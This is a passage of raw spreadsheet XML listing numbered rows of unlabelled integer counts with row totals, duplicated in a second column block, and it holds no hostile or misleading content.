      <c r="K1398" s="7">
        <v>5446</v>
      </c>
      <c r="L1398" s="8">
        <v>15</v>
      </c>
      <c r="M1398" s="8">
        <v>15</v>
      </c>
      <c r="N1398" s="8">
        <v>0</v>
      </c>
      <c r="O1398" s="8">
        <v>1</v>
      </c>
      <c r="P1398" s="8">
        <v>2</v>
      </c>
      <c r="Q1398" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1399" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1399" s="7">
        <v>5448</v>
      </c>
      <c r="B1399" s="8">
        <v>0</v>
      </c>
      <c r="C1399" s="8">
        <v>0</v>
      </c>
      <c r="D1399" s="8">
        <v>0</v>
      </c>
      <c r="E1399" s="8">
        <v>0</v>
      </c>
      <c r="F1399" s="8">
        <v>1</v>
      </c>
      <c r="G1399" s="8">
        <v>6</v>
      </c>
      <c r="H1399" s="8">
        <v>7</v>
      </c>
      <c r="K1399" s="7">
        <v>5448</v>
      </c>
      <c r="L1399" s="8">
        <v>0</v>
      </c>
      <c r="M1399" s="8">
        <v>0</v>
      </c>
      <c r="N1399" s="8">
        <v>0</v>
      </c>
      <c r="O1399" s="8">
        <v>0</v>
      </c>
      <c r="P1399" s="8">
        <v>1</v>
      </c>
      <c r="Q1399" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1400" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1400" s="7">
        <v>5451</v>
      </c>
      <c r="B1400" s="8">
        <v>22</v>
      </c>
      <c r="C1400" s="8">
        <v>1</v>
      </c>
      <c r="D1400" s="8">
        <v>0</v>
      </c>
      <c r="E1400" s="8">
        <v>0</v>
      </c>
      <c r="F1400" s="8">
        <v>8</v>
      </c>
      <c r="G1400" s="8">
        <v>1</v>
      </c>
      <c r="H1400" s="8">
        <v>32</v>
      </c>
      <c r="K1400" s="7">
        <v>5451</v>
      </c>
      <c r="L1400" s="8">
        <v>22</v>
      </c>
      <c r="M1400" s="8">
        <v>1</v>
      </c>
      <c r="N1400" s="8">
        <v>0</v>
      </c>
      <c r="O1400" s="8">
        <v>0</v>
      </c>
      <c r="P1400" s="8">
        <v>8</v>
      </c>
      <c r="Q1400" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1401" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1401" s="7">
        <v>5452</v>
      </c>
      <c r="B1401" s="8">
        <v>0</v>
      </c>
      <c r="C1401" s="8">
        <v>0</v>
      </c>
      <c r="D1401" s="8">
        <v>0</v>
      </c>
      <c r="E1401" s="8">
        <v>0</v>
      </c>
      <c r="F1401" s="8">
        <v>13</v>
      </c>
      <c r="G1401" s="8">
        <v>2</v>
      </c>
      <c r="H1401" s="8">
        <v>15</v>
      </c>
      <c r="K1401" s="7">
        <v>5452</v>
      </c>
      <c r="L1401" s="8">
        <v>0</v>
      </c>
      <c r="M1401" s="8">
        <v>0</v>
      </c>
      <c r="N1401" s="8">
        <v>0</v>
      </c>
      <c r="O1401" s="8">
        <v>0</v>
      </c>
      <c r="P1401" s="8">
        <v>13</v>
      </c>
      <c r="Q1401" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1402" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1402" s="7">
        <v>5454</v>
      </c>
      <c r="B1402" s="8">
        <v>26</v>
      </c>
      <c r="C1402" s="8">
        <v>1</v>
      </c>
      <c r="D1402" s="8">
        <v>18</v>
      </c>
      <c r="E1402" s="8">
        <v>2</v>
      </c>
      <c r="F1402" s="8">
        <v>8</v>
      </c>
      <c r="G1402" s="8">
        <v>4</v>
      </c>
      <c r="H1402" s="8">
        <v>59</v>
      </c>
      <c r="K1402" s="7">
        <v>5454</v>
      </c>
      <c r="L1402" s="8">
        <v>26</v>
      </c>
      <c r="M1402" s="8">
        <v>1</v>
      </c>
      <c r="N1402" s="8">
        <v>18</v>
      </c>
      <c r="O1402" s="8">
        <v>2</v>
      </c>
      <c r="P1402" s="8">
        <v>8</v>
      </c>
      <c r="Q1402" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1403" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1403" s="7">
        <v>5456</v>
      </c>
      <c r="B1403" s="8">
        <v>30</v>
      </c>
      <c r="C1403" s="8">
        <v>1</v>
      </c>
      <c r="D1403" s="8">
        <v>2</v>
      </c>
      <c r="E1403" s="8">
        <v>0</v>
      </c>
      <c r="F1403" s="8">
        <v>1</v>
      </c>
      <c r="G1403" s="8">
        <v>1</v>
      </c>
      <c r="H1403" s="8">
        <v>35</v>
      </c>
      <c r="K1403" s="7">
        <v>5456</v>
      </c>
      <c r="L1403" s="8">
        <v>30</v>
      </c>
      <c r="M1403" s="8">
        <v>1</v>
      </c>
      <c r="N1403" s="8">
        <v>2</v>
      </c>
      <c r="O1403" s="8">
        <v>0</v>
      </c>
      <c r="P1403" s="8">
        <v>1</v>
      </c>
      <c r="Q1403" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1404" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1404" s="7">
        <v>5457</v>
      </c>
      <c r="B1404" s="8">
        <v>30</v>
      </c>
      <c r="C1404" s="8">
        <v>1</v>
      </c>
      <c r="D1404" s="8">
        <v>0</v>
      </c>
      <c r="E1404" s="8">
        <v>0</v>
      </c>
      <c r="F1404" s="8">
        <v>1</v>
      </c>
      <c r="G1404" s="8">
        <v>11</v>
      </c>
      <c r="H1404" s="8">
        <v>43</v>
      </c>
      <c r="K1404" s="7">
        <v>5457</v>
      </c>
      <c r="L1404" s="8">
        <v>30</v>
      </c>
      <c r="M1404" s="8">
        <v>1</v>
      </c>
      <c r="N1404" s="8">
        <v>0</v>
      </c>
      <c r="O1404" s="8">
        <v>0</v>
      </c>
      <c r="P1404" s="8">
        <v>1</v>
      </c>
      <c r="Q1404" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="1405" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1405" s="7">
        <v>5461</v>
      </c>
      <c r="B1405" s="8">
        <v>56</v>
      </c>
      <c r="C1405" s="8">
        <v>30</v>
      </c>
      <c r="D1405" s="8">
        <v>6</v>
      </c>
      <c r="E1405" s="8">
        <v>0</v>
      </c>
      <c r="F1405" s="8">
        <v>5</v>
      </c>
      <c r="G1405" s="8">
        <v>3</v>
      </c>
      <c r="H1405" s="8">
        <v>100</v>
      </c>
      <c r="K1405" s="7">
        <v>5461</v>
      </c>
      <c r="L1405" s="8">
        <v>56</v>
      </c>
      <c r="M1405" s="8">
        <v>30</v>
      </c>
      <c r="N1405" s="8">
        <v>6</v>
      </c>
      <c r="O1405" s="8">
        <v>0</v>
      </c>
      <c r="P1405" s="8">
        <v>5</v>
      </c>
      <c r="Q1405" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1406" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1406" s="7">
        <v>5465</v>
      </c>
      <c r="B1406" s="8">
        <v>28</v>
      </c>
      <c r="C1406" s="8">
        <v>1</v>
      </c>
      <c r="D1406" s="8">
        <v>0</v>
      </c>
      <c r="E1406" s="8">
        <v>0</v>
      </c>
      <c r="F1406" s="8">
        <v>17</v>
      </c>
      <c r="G1406" s="8">
        <v>7</v>
      </c>
      <c r="H1406" s="8">
        <v>53</v>
      </c>
      <c r="K1406" s="7">
        <v>5465</v>
      </c>
      <c r="L1406" s="8">
        <v>28</v>
      </c>
      <c r="M1406" s="8">
        <v>1</v>
      </c>
      <c r="N1406" s="8">
        <v>0</v>
      </c>
      <c r="O1406" s="8">
        <v>0</v>
      </c>
      <c r="P1406" s="8">
        <v>17</v>
      </c>
      <c r="Q1406" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="1407" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1407" s="7">
        <v>5466</v>
      </c>
      <c r="B1407" s="8">
        <v>24</v>
      </c>
      <c r="C1407" s="8">
        <v>3</v>
      </c>
      <c r="D1407" s="8">
        <v>70</v>
      </c>
      <c r="E1407" s="8">
        <v>65</v>
      </c>
      <c r="F1407" s="8">
        <v>29</v>
      </c>
      <c r="G1407" s="8">
        <v>33</v>
      </c>
      <c r="H1407" s="8">
        <v>224</v>
      </c>
      <c r="K1407" s="7">
        <v>5466</v>
      </c>
      <c r="L1407" s="8">
        <v>24</v>
      </c>
      <c r="M1407" s="8">
        <v>3</v>
      </c>
      <c r="N1407" s="8">
        <v>70</v>
      </c>
      <c r="O1407" s="8">
        <v>65</v>
      </c>
      <c r="P1407" s="8">
        <v>29</v>
      </c>
      <c r="Q1407" s="8">
        <v>33</v>
      </c>
    </row>
    <row r="1408" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1408" s="7">
        <v>5467</v>
      </c>
      <c r="B1408" s="8">
        <v>24</v>
      </c>
      <c r="C1408" s="8">
        <v>1</v>
      </c>
      <c r="D1408" s="8">
        <v>0</v>
      </c>
      <c r="E1408" s="8">
        <v>2</v>
      </c>
      <c r="F1408" s="8">
        <v>1</v>
      </c>
      <c r="G1408" s="8">
        <v>1</v>
      </c>
      <c r="H1408" s="8">
        <v>29</v>
      </c>
      <c r="K1408" s="7">
        <v>5467</v>
      </c>
      <c r="L1408" s="8">
        <v>24</v>
      </c>
      <c r="M1408" s="8">
        <v>1</v>
      </c>
      <c r="N1408" s="8">
        <v>0</v>
      </c>
      <c r="O1408" s="8">
        <v>2</v>
      </c>
      <c r="P1408" s="8">
        <v>1</v>
      </c>
      <c r="Q1408" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1409" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1409" s="7">
        <v>5468</v>
      </c>
      <c r="B1409" s="8">
        <v>25</v>
      </c>
      <c r="C1409" s="8">
        <v>1</v>
      </c>
      <c r="D1409" s="8">
        <v>2</v>
      </c>
      <c r="E1409" s="8">
        <v>10</v>
      </c>
      <c r="F1409" s="8">
        <v>2</v>
      </c>
      <c r="G1409" s="8">
        <v>0</v>
      </c>
      <c r="H1409" s="8">
        <v>40</v>
      </c>
      <c r="K1409" s="7">
        <v>5468</v>
      </c>
      <c r="L1409" s="8">
        <v>25</v>
      </c>
      <c r="M1409" s="8">
        <v>1</v>
      </c>
      <c r="N1409" s="8">
        <v>2</v>
      </c>
      <c r="O1409" s="8">
        <v>10</v>
      </c>
      <c r="P1409" s="8">
        <v>2</v>
      </c>
      <c r="Q1409" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1410" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1410" s="7">
        <v>5469</v>
      </c>
      <c r="B1410" s="8">
        <v>25</v>
      </c>
      <c r="C1410" s="8">
        <v>1</v>
      </c>
      <c r="D1410" s="8">
        <v>1</v>
      </c>
      <c r="E1410" s="8">
        <v>10</v>
      </c>
      <c r="F1410" s="8">
        <v>2</v>
      </c>
      <c r="G1410" s="8">
        <v>1</v>
      </c>
      <c r="H1410" s="8">
        <v>40</v>
      </c>
      <c r="K1410" s="7">
        <v>5469</v>
      </c>
      <c r="L1410" s="8">
        <v>25</v>
      </c>
      <c r="M1410" s="8">
        <v>1</v>
      </c>
      <c r="N1410" s="8">
        <v>1</v>
      </c>
      <c r="O1410" s="8">
        <v>10</v>
      </c>
      <c r="P1410" s="8">
        <v>2</v>
      </c>
      <c r="Q1410" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1411" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1411" s="7">
        <v>5470</v>
      </c>
      <c r="B1411" s="8">
        <v>27</v>
      </c>
      <c r="C1411" s="8">
        <v>0</v>
      </c>
      <c r="D1411" s="8">
        <v>3</v>
      </c>
      <c r="E1411" s="8">
        <v>0</v>
      </c>
      <c r="F1411" s="8">
        <v>3</v>
      </c>
      <c r="G1411" s="8">
        <v>0</v>
      </c>
      <c r="H1411" s="8">
        <v>33</v>
      </c>
      <c r="K1411" s="7">
        <v>5470</v>
      </c>
      <c r="L1411" s="8">
        <v>27</v>
      </c>
      <c r="M1411" s="8">
        <v>0</v>
      </c>
      <c r="N1411" s="8">
        <v>3</v>
      </c>
      <c r="O1411" s="8">
        <v>0</v>
      </c>
      <c r="P1411" s="8">
        <v>3</v>
      </c>
      <c r="Q1411" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1412" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1412" s="7">
        <v>5473</v>
      </c>
      <c r="B1412" s="8">
        <v>26</v>
      </c>
      <c r="C1412" s="8">
        <v>0</v>
      </c>
      <c r="D1412" s="8">
        <v>2</v>
      </c>
      <c r="E1412" s="8">
        <v>8</v>
      </c>
      <c r="F1412" s="8">
        <v>2</v>
      </c>
      <c r="G1412" s="8">
        <v>0</v>
      </c>
      <c r="H1412" s="8">
        <v>38</v>
      </c>
      <c r="K1412" s="7">
        <v>5473</v>
      </c>
      <c r="L1412" s="8">
        <v>26</v>
      </c>
      <c r="M1412" s="8">
        <v>0</v>
      </c>
      <c r="N1412" s="8">
        <v>2</v>
      </c>
      <c r="O1412" s="8">
        <v>8</v>
      </c>
      <c r="P1412" s="8">
        <v>2</v>
      </c>
      <c r="Q1412" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1413" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1413" s="7">
        <v>5474</v>
      </c>
      <c r="B1413" s="8">
        <v>27</v>
      </c>
      <c r="C1413" s="8">
        <v>0</v>
      </c>
      <c r="D1413" s="8">
        <v>3</v>
      </c>
      <c r="E1413" s="8">
        <v>0</v>
      </c>
      <c r="F1413" s="8">
        <v>2</v>
      </c>
      <c r="G1413" s="8">
        <v>0</v>
      </c>
      <c r="H1413" s="8">
        <v>32</v>
      </c>
      <c r="K1413" s="7">
        <v>5474</v>
      </c>
      <c r="L1413" s="8">
        <v>27</v>
      </c>
      <c r="M1413" s="8">
        <v>0</v>
      </c>
      <c r="N1413" s="8">
        <v>3</v>
      </c>
      <c r="O1413" s="8">
        <v>0</v>
      </c>
      <c r="P1413" s="8">
        <v>2</v>
      </c>
      <c r="Q1413" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1414" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1414" s="7">
        <v>5475</v>
      </c>
      <c r="B1414" s="8">
        <v>25</v>
      </c>
      <c r="C1414" s="8">
        <v>1</v>
      </c>
      <c r="D1414" s="8">
        <v>0</v>
      </c>
      <c r="E1414" s="8">
        <v>0</v>
      </c>
      <c r="F1414" s="8">
        <v>8</v>
      </c>
      <c r="G1414" s="8">
        <v>2</v>
      </c>
      <c r="H1414" s="8">
        <v>36</v>
      </c>
      <c r="K1414" s="7">
        <v>5475</v>
      </c>
      <c r="L1414" s="8">
        <v>25</v>
      </c>
      <c r="M1414" s="8">
        <v>1</v>
      </c>
      <c r="N1414" s="8">
        <v>0</v>
      </c>
      <c r="O1414" s="8">
        <v>0</v>
      </c>
      <c r="P1414" s="8">
        <v>8</v>
      </c>
      <c r="Q1414" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1415" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1415" s="7">
        <v>5476</v>
      </c>
      <c r="B1415" s="8">
        <v>26</v>
      </c>
      <c r="C1415" s="8">
        <v>2</v>
      </c>
      <c r="D1415" s="8">
        <v>0</v>
      </c>
      <c r="E1415" s="8">
        <v>0</v>
      </c>
      <c r="F1415" s="8">
        <v>21</v>
      </c>
      <c r="G1415" s="8">
        <v>8</v>
      </c>
      <c r="H1415" s="8">
        <v>57</v>
      </c>
      <c r="K1415" s="7">
        <v>5476</v>
      </c>
      <c r="L1415" s="8">
        <v>26</v>
      </c>
      <c r="M1415" s="8">
        <v>2</v>
      </c>
      <c r="N1415" s="8">
        <v>0</v>
      </c>
      <c r="O1415" s="8">
        <v>0</v>
      </c>
      <c r="P1415" s="8">
        <v>21</v>
      </c>
      <c r="Q1415" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="1416" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1416" s="7">
        <v>5477</v>
      </c>
      <c r="B1416" s="8">
        <v>50</v>
      </c>
      <c r="C1416" s="8">
        <v>4</v>
      </c>
      <c r="D1416" s="8">
        <v>68</v>
      </c>
      <c r="E1416" s="8">
        <v>44</v>
      </c>
      <c r="F1416" s="8">
        <v>64</v>
      </c>
      <c r="G1416" s="8">
        <v>18</v>
      </c>
      <c r="H1416" s="8">
        <v>248</v>
      </c>
      <c r="K1416" s="7">
        <v>5477</v>
      </c>
      <c r="L1416" s="8">
        <v>50</v>
      </c>
      <c r="M1416" s="8">
        <v>4</v>
      </c>
      <c r="N1416" s="8">
        <v>68</v>
      </c>
      <c r="O1416" s="8">
        <v>44</v>
      </c>
      <c r="P1416" s="8">
        <v>64</v>
      </c>
      <c r="Q1416" s="8">
        <v>18</v>
      </c>
    </row>
    <row r="1417" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1417" s="7">
        <v>5479</v>
      </c>
      <c r="B1417" s="8">
        <v>21</v>
      </c>
      <c r="C1417" s="8">
        <v>1</v>
      </c>
      <c r="D1417" s="8">
        <v>22</v>
      </c>
      <c r="E1417" s="8">
        <v>60</v>
      </c>
      <c r="F1417" s="8">
        <v>25</v>
      </c>
      <c r="G1417" s="8">
        <v>13</v>
      </c>
      <c r="H1417" s="8">
        <v>142</v>
      </c>
      <c r="K1417" s="7">
        <v>5479</v>
      </c>
      <c r="L1417" s="8">
        <v>21</v>
      </c>
      <c r="M1417" s="8">
        <v>1</v>
      </c>
      <c r="N1417" s="8">
        <v>22</v>
      </c>
      <c r="O1417" s="8">
        <v>60</v>
      </c>
      <c r="P1417" s="8">
        <v>25</v>
      </c>
      <c r="Q1417" s="8">
        <v>13</v>
      </c>
    </row>
    <row r="1418" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1418" s="7">
        <v>5480</v>
      </c>
      <c r="B1418" s="8">
        <v>25</v>
      </c>
      <c r="C1418" s="8">
        <v>1</v>
      </c>
      <c r="D1418" s="8">
        <v>86</v>
      </c>
      <c r="E1418" s="8">
        <v>210</v>
      </c>
      <c r="F1418" s="8">
        <v>13</v>
      </c>
      <c r="G1418" s="8">
        <v>18</v>
      </c>
      <c r="H1418" s="8">
        <v>353</v>
      </c>
      <c r="K1418" s="7">
        <v>5480</v>
      </c>
      <c r="L1418" s="8">
        <v>25</v>
      </c>
      <c r="M1418" s="8">
        <v>1</v>
      </c>
      <c r="N1418" s="8">
        <v>86</v>
      </c>
      <c r="O1418" s="8">
        <v>210</v>
      </c>
      <c r="P1418" s="8">
        <v>13</v>
      </c>
      <c r="Q1418" s="8">
        <v>18</v>
      </c>
    </row>
    <row r="1419" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1419" s="7">
        <v>5481</v>
      </c>
      <c r="B1419" s="8">
        <v>26</v>
      </c>
      <c r="C1419" s="8">
        <v>0</v>
      </c>
      <c r="D1419" s="8">
        <v>0</v>
      </c>
      <c r="E1419" s="8">
        <v>0</v>
      </c>
      <c r="F1419" s="8">
        <v>4</v>
      </c>
      <c r="G1419" s="8">
        <v>6</v>
      </c>
      <c r="H1419" s="8">
        <v>36</v>
      </c>
      <c r="K1419" s="7">
        <v>5481</v>
      </c>
      <c r="L1419" s="8">
        <v>26</v>
      </c>
      <c r="M1419" s="8">
        <v>0</v>
      </c>
      <c r="N1419" s="8">
        <v>0</v>
      </c>
      <c r="O1419" s="8">
        <v>0</v>
      </c>
      <c r="P1419" s="8">
        <v>4</v>
      </c>
      <c r="Q1419" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1420" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1420" s="7">
        <v>5483</v>
      </c>
      <c r="B1420" s="8">
        <v>28</v>
      </c>
      <c r="C1420" s="8">
        <v>1</v>
      </c>
      <c r="D1420" s="8">
        <v>2</v>
      </c>
      <c r="E1420" s="8">
        <v>0</v>
      </c>
      <c r="F1420" s="8">
        <v>3</v>
      </c>
      <c r="G1420" s="8">
        <v>2</v>
      </c>
      <c r="H1420" s="8">
        <v>36</v>
      </c>
      <c r="K1420" s="7">
        <v>5483</v>
      </c>
      <c r="L1420" s="8">
        <v>28</v>
      </c>
      <c r="M1420" s="8">
        <v>1</v>
      </c>
      <c r="N1420" s="8">
        <v>2</v>
      </c>
      <c r="O1420" s="8">
        <v>0</v>
      </c>
      <c r="P1420" s="8">
        <v>3</v>
      </c>
      <c r="Q1420" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1421" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1421" s="7">
        <v>5484</v>
      </c>
      <c r="B1421" s="8">
        <v>30</v>
      </c>
      <c r="C1421" s="8">
        <v>1</v>
      </c>
      <c r="D1421" s="8">
        <v>0</v>
      </c>
      <c r="E1421" s="8">
        <v>0</v>
      </c>
      <c r="F1421" s="8">
        <v>4</v>
      </c>
      <c r="G1421" s="8">
        <v>0</v>
      </c>
      <c r="H1421" s="8">
        <v>35</v>
      </c>
      <c r="K1421" s="7">
        <v>5484</v>
      </c>
      <c r="L1421" s="8">
        <v>30</v>
      </c>
      <c r="M1421" s="8">
        <v>1</v>
      </c>
      <c r="N1421" s="8">
        <v>0</v>
      </c>
      <c r="O1421" s="8">
        <v>0</v>
      </c>
      <c r="P1421" s="8">
        <v>4</v>
      </c>
      <c r="Q1421" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1422" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1422" s="7">
        <v>5485</v>
      </c>
      <c r="B1422" s="8">
        <v>30</v>
      </c>
      <c r="C1422" s="8">
        <v>1</v>
      </c>
      <c r="D1422" s="8">
        <v>1</v>
      </c>
      <c r="E1422" s="8">
        <v>0</v>
      </c>
      <c r="F1422" s="8">
        <v>7</v>
      </c>
      <c r="G1422" s="8">
        <v>1</v>
      </c>
      <c r="H1422" s="8">
        <v>40</v>
      </c>
      <c r="K1422" s="7">
        <v>5485</v>
      </c>
      <c r="L1422" s="8">
        <v>30</v>
      </c>
      <c r="M1422" s="8">
        <v>1</v>
      </c>
      <c r="N1422" s="8">
        <v>1</v>
      </c>
      <c r="O1422" s="8">
        <v>0</v>
      </c>
      <c r="P1422" s="8">
        <v>7</v>
      </c>
      <c r="Q1422" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1423" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1423" s="7">
        <v>5487</v>
      </c>
      <c r="B1423" s="8">
        <v>28</v>
      </c>
      <c r="C1423" s="8">
        <v>1</v>
      </c>
      <c r="D1423" s="8">
        <v>0</v>
      </c>
      <c r="E1423" s="8">
        <v>0</v>
      </c>
      <c r="F1423" s="8">
        <v>7</v>
      </c>
      <c r="G1423" s="8">
        <v>0</v>
      </c>
      <c r="H1423" s="8">
        <v>36</v>
      </c>
      <c r="K1423" s="7">
        <v>5487</v>
      </c>
      <c r="L1423" s="8">
        <v>28</v>
      </c>
      <c r="M1423" s="8">
        <v>1</v>
      </c>
      <c r="N1423" s="8">
        <v>0</v>
      </c>
      <c r="O1423" s="8">
        <v>0</v>
      </c>
      <c r="P1423" s="8">
        <v>7</v>
      </c>
      <c r="Q1423" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1424" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1424" s="7">
        <v>5489</v>
      </c>
      <c r="B1424" s="8">
        <v>20</v>
      </c>
      <c r="C1424" s="8">
        <v>1</v>
      </c>
      <c r="D1424" s="8">
        <v>16</v>
      </c>
      <c r="E1424" s="8">
        <v>20</v>
      </c>
      <c r="F1424" s="8">
        <v>11</v>
      </c>
      <c r="G1424" s="8">
        <v>15</v>
      </c>
      <c r="H1424" s="8">
        <v>83</v>
      </c>
      <c r="K1424" s="7">
        <v>5489</v>
      </c>
      <c r="L1424" s="8">
        <v>20</v>
      </c>
      <c r="M1424" s="8">
        <v>1</v>
      </c>
      <c r="N1424" s="8">
        <v>16</v>
      </c>
      <c r="O1424" s="8">
        <v>20</v>
      </c>
      <c r="P1424" s="8">
        <v>11</v>
      </c>
      <c r="Q1424" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="1425" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1425" s="7">
        <v>5491</v>
      </c>
      <c r="B1425" s="8">
        <v>25</v>
      </c>
      <c r="C1425" s="8">
        <v>1</v>
      </c>
      <c r="D1425" s="8">
        <v>0</v>
      </c>
      <c r="E1425" s="8">
        <v>3</v>
      </c>
      <c r="F1425" s="8">
        <v>1</v>
      </c>
      <c r="G1425" s="8">
        <v>0</v>
      </c>
      <c r="H1425" s="8">
        <v>30</v>
      </c>
      <c r="K1425" s="7">
        <v>5491</v>
      </c>
      <c r="L1425" s="8">
        <v>25</v>
      </c>
      <c r="M1425" s="8">
        <v>1</v>
      </c>
      <c r="N1425" s="8">
        <v>0</v>
      </c>
      <c r="O1425" s="8">
        <v>3</v>
      </c>
      <c r="P1425" s="8">
        <v>1</v>
      </c>
      <c r="Q1425" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1426" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1426" s="7">
        <v>5492</v>
      </c>
      <c r="B1426" s="8">
        <v>30</v>
      </c>
      <c r="C1426" s="8">
        <v>1</v>
      </c>
      <c r="D1426" s="8">
        <v>4</v>
      </c>
      <c r="E1426" s="8">
        <v>30</v>
      </c>
      <c r="F1426" s="8">
        <v>5</v>
      </c>
      <c r="G1426" s="8">
        <v>0</v>
      </c>
      <c r="H1426" s="8">
        <v>70</v>
      </c>
      <c r="K1426" s="7">
        <v>5492</v>
      </c>
      <c r="L1426" s="8">
        <v>30</v>
      </c>
      <c r="M1426" s="8">
        <v>1</v>
      </c>
      <c r="N1426" s="8">
        <v>4</v>
      </c>
      <c r="O1426" s="8">
        <v>30</v>
      </c>
      <c r="P1426" s="8">
        <v>5</v>
      </c>
      <c r="Q1426" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1427" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1427" s="7">
        <v>5495</v>
      </c>
      <c r="B1427" s="8">
        <v>6</v>
      </c>
      <c r="C1427" s="8">
        <v>1</v>
      </c>
      <c r="D1427" s="8">
        <v>1</v>
      </c>
      <c r="E1427" s="8">
        <v>3</v>
      </c>
      <c r="F1427" s="8">
        <v>2</v>
      </c>
      <c r="G1427" s="8">
        <v>4</v>
      </c>
      <c r="H1427" s="8">
        <v>17</v>
      </c>
      <c r="K1427" s="7">
        <v>5495</v>
      </c>
      <c r="L1427" s="8">
        <v>6</v>
      </c>
      <c r="M1427" s="8">
        <v>1</v>
      </c>
      <c r="N1427" s="8">
        <v>1</v>
      </c>
      <c r="O1427" s="8">
        <v>3</v>
      </c>
      <c r="P1427" s="8">
        <v>2</v>
      </c>
      <c r="Q1427" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1428" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1428" s="7">
        <v>5501</v>
      </c>
      <c r="B1428" s="8">
        <v>6</v>
      </c>
      <c r="C1428" s="8">
        <v>0</v>
      </c>
      <c r="D1428" s="8">
        <v>0</v>
      </c>
      <c r="E1428" s="8">
        <v>5</v>
      </c>
      <c r="F1428" s="8">
        <v>6</v>
      </c>
      <c r="G1428" s="8">
        <v>1</v>
      </c>
      <c r="H1428" s="8">
        <v>18</v>
      </c>
      <c r="K1428" s="7">
        <v>5501</v>
      </c>
      <c r="L1428" s="8">
        <v>6</v>
      </c>
      <c r="M1428" s="8">
        <v>0</v>
      </c>
      <c r="N1428" s="8">
        <v>0</v>
      </c>
      <c r="O1428" s="8">
        <v>5</v>
      </c>
      <c r="P1428" s="8">
        <v>6</v>
      </c>
      <c r="Q1428" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1429" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1429" s="7">
        <v>5502</v>
      </c>
      <c r="B1429" s="8">
        <v>0</v>
      </c>
      <c r="C1429" s="8">
        <v>0</v>
      </c>
      <c r="D1429" s="8">
        <v>10</v>
      </c>
      <c r="E1429" s="8">
        <v>2</v>
      </c>
      <c r="F1429" s="8">
        <v>2</v>
      </c>
      <c r="G1429" s="8">
        <v>1</v>
      </c>
      <c r="H1429" s="8">
        <v>15</v>
      </c>
      <c r="K1429" s="7">
        <v>5502</v>
      </c>
      <c r="L1429" s="8">
        <v>0</v>
      </c>
      <c r="M1429" s="8">
        <v>0</v>
      </c>
      <c r="N1429" s="8">
        <v>10</v>
      </c>
      <c r="O1429" s="8">
        <v>2</v>
      </c>
      <c r="P1429" s="8">
        <v>2</v>
      </c>
      <c r="Q1429" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1430" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1430" s="7">
        <v>5504</v>
      </c>
      <c r="B1430" s="8">
        <v>6</v>
      </c>
      <c r="C1430" s="8">
        <v>2</v>
      </c>
      <c r="D1430" s="8">
        <v>0</v>
      </c>
      <c r="E1430" s="8">
        <v>0</v>
      </c>
      <c r="F1430" s="8">
        <v>2</v>
      </c>
      <c r="G1430" s="8">
        <v>2</v>
      </c>
      <c r="H1430" s="8">
        <v>12</v>
      </c>
      <c r="K1430" s="7">
        <v>5504</v>
      </c>
      <c r="L1430" s="8">
        <v>6</v>
      </c>
      <c r="M1430" s="8">
        <v>2</v>
      </c>
      <c r="N1430" s="8">
        <v>0</v>
      </c>
      <c r="O1430" s="8">
        <v>0</v>
      </c>
      <c r="P1430" s="8">
        <v>2</v>
      </c>
      <c r="Q1430" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1431" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1431" s="7">
        <v>5505</v>
      </c>
      <c r="B1431" s="8">
        <v>25</v>
      </c>
      <c r="C1431" s="8">
